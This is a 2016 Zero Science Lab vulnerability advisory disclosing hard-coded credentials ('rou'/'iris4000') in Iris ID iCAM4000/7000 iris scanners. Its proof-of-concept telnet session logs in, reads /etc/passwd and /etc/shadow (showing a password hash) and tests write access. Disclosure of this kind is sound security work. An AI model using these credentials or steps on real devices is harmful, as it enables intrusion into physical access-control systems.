Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access

2016-07-26T00:00:00
ID ZSL-2016-5347
Type zeroscience
Reporter Gjoko Krstic
Modified 2016-07-26T00:00:00

Description

Title: Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access
Advisory ID: ZSL-2016-5347
Type: Local/Remote
Impact: System Access
Risk: (5/5)
Release Date: 26.07.2016

Summary

The 4th generation IrisAccess™ 7000 series iris recognition solution offered by Iris ID provides fast, secure, and highly accurate, non-contact identification by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy integration with many Wiegand and network based access control, time and attendance, visitor management and point of sale applications.

The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess 4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust, iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional wall-mount is used.

Description

The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials. When visiting the device interface with a browser on port 80, the application loads an applet JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. In the JAR file there is an account 'rou' with password 'iris4000' that has read and limited write privileges on the affected node. An attacker can access the device using these credentials starting a simple telnet session on port 23 gaining access to sensitive information and/or FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content.

--------------------------------------------------------------------------------

` /html/ICAMClient.jar (ICAMClient.java):

97: param_host = getParameter("host");
98: param_user = "rou";//getParameter("user");
99: param_pass = "iris4000";//getParameter("pass"); // password
100: param_path = getParameter("path"); // path on the server

/etc/ftpd/ftpd.conf:

69: # User list:
70: # Format: user=
71: # user name
72: # password or * for anonymous access
73: # (internally appended to serverroot)
74: # the user has access to the WHOLE SUBTREE,
75: # if the server has access to it
76: # maximal logins with this usertype
77: # D - download
78: # U - upload + making directories
79: # O - overwrite existing files
80: # M - allows multiple logins
81: # E - allows erase operations
82: # A - allows EVERYTHING(!)
101:
103: user=rou iris4000 / 5 A
`
--------------------------------------------------------------------------------

Vendor

Iris ID, Inc. - <http://www.irisid.com>

Affected Version

iCAM4000:
iCAM Software: 3.09.02
iCAM File system: 1.3
CMR Firmware: 5.5 and 3.8
EIF Firmware: 9.5 and 8.0
HID iClass Library: 2.01.05
ImageData Library: 1.153
Command Process: 1.02

iCAM7000:
iCAM Software: 8.01.07
iCAM File system: 1.4.0
EIF Firmware: 1.9
HID iClass Library: 1.00.00
ImageData Library: 01.01.32
EyeSeek Library: 5.00
Countermeasure Library: 3.00
LensFinder Library: 5.00
Tilt Assist Library: 4.00

Tested On

GNU/Linux 2.4.19 (armv5tel)

Vendor Status

[06.05.2016] Vulnerability discovered.
[09.05.2016] Vendor contacted.
[12.06.2016] Vendor contacted again.
[26.07.2016] No response from the vendor.
[27.07.2016] Public security advisory released.

PoC

irisid_hardcoded.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://www.exploit-db.com/exploits/40167/>
[2] <https://cxsecurity.com/issue/WLB-2016070201>
[3] <https://packetstormsecurity.com/files/138078>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/115506>

Changelog

[26.07.2016] - Initial release
[27.07.2016] - Added reference [1], [2] and [3]
[29.07.2016] - Addded reference [4]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            
Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access


Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
                  http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/
                  http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
                  http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/
                  http://www.irisid.com/productssolutions/hardwareproducts/icam7-series/

Affected version: iCAM4000:
                  iCAM Software: 3.09.02
                  iCAM File system: 1.3
                  CMR Firmware: 5.5 and 3.8
                  EIF Firmware: 9.5 and 8.0
                  HID iClass Library: 2.01.05
                  ImageData Library: 1.153
                  Command Process: 1.02

                  iCAM7000:
                  iCAM Software: 8.01.07
                  iCAM File system: 1.4.0
                  EIF Firmware: 1.9
                  HID iClass Library: 1.00.00
                  ImageData Library: 01.01.32
                  EyeSeek Library: 5.00
                  Countermeasure Library: 3.00
                  LensFinder Library: 5.00
                  Tilt Assist Library: 4.00

Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered
by Iris ID provides fast, secure, and highly accurate, non-contact identification
by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy
integration with many Wiegand and network based access control, time and attendance,
visitor management and point of sale applications.

The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess
4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust,
iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional
wall-mount is used.

Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials.
When visiting the device interface with a browser on port 80, the application loads an applet
JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. In the
JAR file there is an account 'rou' with password 'iris4000' that has read and limited write
privileges on the affected node. An attacker can access the device using these credentials
starting a simple telnet session on port 23 gaining access to sensitive information and/or
FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content.

=====================================================================================

/html/ICAMClient.jar (ICAMClient.java):
---------------------------------------

97:  param_host = getParameter("host");
98:  param_user = "rou";//getParameter("user");
99:  param_pass = "iris4000";//getParameter("pass"); // password
100: param_path = getParameter("path"); // path on the server


/etc/ftpd/ftpd.conf:
--------------------

69:  # User list:
70:  # Format:  user=&lt;login&gt; &lt;passwd&gt; &lt;subdir&gt; &lt;maxlogins&gt; &lt;flags&gt;
71:  #           &lt;login&gt;     user name
72:  #           &lt;passwd&gt;    password or * for anonymous access
73:  #           &lt;subdir&gt;    (internally appended to serverroot)
74:  #                       the user has access to the WHOLE SUBTREE,
75:  #                       if the server has access to it
76:  #           &lt;maxlogins&gt; maximal logins with this usertype
77:  #           &lt;flags&gt;     D - download
78:  #                       U - upload + making directories
79:  #                       O - overwrite existing files
80:  #                       M - allows multiple logins
81:  #                       E - allows erase operations
82:  #                       A - allows EVERYTHING(!)
101: 
103: user=rou iris4000 / 5 A

=====================================================================================


Tested on: GNU/Linux 2.4.19 (armv5tel)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5347
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php


06.05.2016

--


telnet [IP]
iCAM4000 login: rou
Password:
[rou@iCAM4000 rou]# id
uid=500(rou) gid=500(rou) groups=500(rou)
[rou@iCAM4000 rou]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
rou:x:500:500::/home/rou:/bin/bash
[rou@iCAM4000 rou]# cd /web
[rou@iCAM4000 /web]# ls -al
total 0
drwxrwxr-x    1 rou      rou             0 Jul 26 07:22 .
drwxr-xr-x    1 root     root            0 Jan  1  1970 ..
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 cgi-bin
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 html
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 images
[rou@iCAM4000 /web]# cat /etc/shadow
root:{{REMOVED}}
bin:*:10897:0:99999:7:::
daemon:*:10897:0:99999:7:::
adm:*:10897:0:99999:7:::
lp:*:10897:0:99999:7:::
sync:*:10897:0:99999:7:::
shutdown:*:10897:0:99999:7:::
halt:*:10897:0:99999:7:::
mail:*:10897:0:99999:7:::
news:*:10897:0:99999:7:::
uucp:*:10897:0:99999:7:::
operator:*:10897:0:99999:7:::
games:*:10897:0:99999:7:::
gopher:*:10897:0:99999:7:::
ftp:*:10897:0:99999:7:::
nobody:*:10897:0:99999:7:::
rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
[rou@iCAM4000 /web]# cat /etc/issue

Iris@ID iCAM4000 Linux (experimental)
Kernel 2.4.19-rmk7-pxa1 on an armv5tel
[rou@iCAM4000 /web]# ls -al html/
total 289
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 .
drwxrwxr-x    1 rou      rou             0 Jul 26 07:22 ..
-rw-rw-r--    1 rou      rou          4035 Jan 31  2013 DHCPSettings_reboot.htm
-rw-rw-r--    1 rou      rou        100614 Jan 10  2008 ICAMClient.jar
-rw-rw-r--    1 rou      rou          6376 Jan 31  2013 WiegandSettings.htm
-rw-rw-r--    1 rou      rou          5643 Jan 31  2013 authentication.htm
-rw-rw-r--    1 rou      rou          6166 Jan 31  2013 changeusername.htm
-rw-rw-r--    1 rou      rou          4816 Jan 31  2013 displayconfigsettings.htm
-rw-rw-r--    1 rou      rou          5643 Jan 31  2013 downloadauthentication.htm
-rw-rw-r--    1 rou      rou          4850 Jan 31  2013 downloadvoice_result.htm
-rw-rw-r--    1 rou      rou          3237 Jan 31  2013 error.htm
-rw-rw-r--    1 rou      rou          3234 Jan 31  2013 error_ip.htm
-rw-rw-r--    1 rou      rou          3248 Jan 31  2013 error_loginfailure.htm
-rw-rw-r--    1 rou      rou          3349 Jan 31  2013 error_usb_ip.htm
-rw-rw-r--    1 rou      rou          6128 Jan 31  2013 ftpupload.htm
-rw-rw-r--    1 rou      rou          5331 Jan 31  2013 iCAMConfig.htm
-rw-rw-r--    1 rou      rou          4890 Jan 31  2013 icamconfig_reboot.htm
-rw-rw-r--    1 rou      rou          5314 Jan 31  2013 index.htm
-rw-rw-r--    1 rou      rou          7290 Jan 31  2013 main.htm
-rw-rw-r--    1 rou      rou          3662 Jan 31  2013 reboot_result.htm
-rw-rw-r--    1 rou      rou          5782 Jan 31  2013 smartcardauthentication.htm
-rw-rw-r--    1 rou      rou         17783 Jan 31  2013 smartcardconfig.htm
-rw-rw-r--    1 rou      rou          4895 Jan 31  2013 smartcardconfig_reboot.htm
-rw-rw-r--    1 rou      rou          5809 Jan 31  2013 smartcardconfig_result.htm
-rw-rw-r--    1 rou      rou          3672 Jan 31  2013 systeminfo.htm
-rw-rw-r--    1 rou      rou          5870 Jan 31  2013 updateicamconfig.htm
-rw-rw-r--    1 rou      rou          4239 Jan 31  2013 updateicamconfig_result.htm
-rw-rw-r--    1 rou      rou          6612 Jan 31  2013 updatenetworksettings.htm
-rw-rw-r--    1 rou      rou          4651 Jan 31  2013 updatenetworksettings_result.htm
-rw-rw-r--    1 rou      rou          5014 Jan 31  2013 updatenetworksettings_state.htm
-rw-rw-r--    1 rou      rou          3985 Jan 31  2013 upload.htm
-rw-rw-r--    1 rou      rou          5645 Jan 31  2013 uploadauthentication.htm
-rw-rw-r--    1 rou      rou          4737 Jan 31  2013 uploadiriscapture_result.htm
-rw-rw-r--    1 rou      rou          6028 Jan 31  2013 voicemessagedownload.htm
-rw-rw-r--    1 rou      rou          6299 Jan 31  2013 voicemessageupdate.htm
-rw-rw-r--    1 rou      rou          5645 Jan 31  2013 wiegandauthentication.htm
-rw-rw-r--    1 rou      rou          4893 Jan 31  2013 wiegandconfig_reboot.htm
[rou@iCAM4000 /web]# echo $SHELL
/bin/bash
[rou@iCAM4000 /web]# echo pwn &gt; test.write
[rou@iCAM4000 /web]# cat test.write
pwn
[rou@iCAM4000 /web]# rm -rf test.write
[rou@iCAM4000 /web]# cd /etc/ftpd
[rou@iCAM4000 ftpd]# pwd
/etc/ftpd
[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
user=rou iris4000 / 5 A
[rou@iCAM4000 ftpd]# ^D
Connection to host lost.